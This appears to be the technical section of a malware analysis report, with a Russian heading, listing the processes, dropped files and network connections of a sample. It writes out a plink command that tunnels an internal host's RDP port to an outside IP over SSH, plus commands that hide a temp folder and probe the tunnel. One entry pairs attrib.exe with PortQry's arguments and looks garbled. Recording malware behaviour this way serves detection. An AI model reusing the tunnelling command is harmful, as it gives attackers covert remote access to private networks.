Техническая информация
- '%TEMP%\afolder\PortQry.exe' /pid=2640
- '%TEMP%\afolder\PortQry.exe' /pid=1760
- '%TEMP%\afolder\PortQry.exe' -q -n localhost -e 11000
- '%TEMP%\afolder\avaaJDtrm.exe'
- '%TEMP%\afolder\plink.exe' -ssh 194.100.70.146 -P 3068 -l %USERNAME% -L 11000:192.168.10.23:3389
- '<SYSTEM32>\attrib.exe' -q -n localhost -e 11000
- '<SYSTEM32>\attrib.exe' +h %TEMP%\ztmp
- <SYSTEM32>\cmd.exe
- <SYSTEM32>\attrib.exe
- %TEMP%\ztmp\tmp1415.bat
- %TEMP%\afolder\PortQry.exe
- %TEMP%\afolder\JDtrm.RDP
- %TEMP%\ztmp\tmp4555.exe
- <LS_APPDATA>\PUTTY.RND
- %TEMP%\afolder\plink.exe
- %TEMP%\afolder\avaaJDtrm.exe
- %TEMP%\ztmp\tmp1699.exe
- %TEMP%\ztmp\tmp1650.bat
- %TEMP%\ztmp\tmp1699.exe
- %TEMP%\afolder\plink.exe
- %TEMP%\afolder\avaaJDtrm.exe
- 'localhost':11000
- '19#.#00.70.146':3068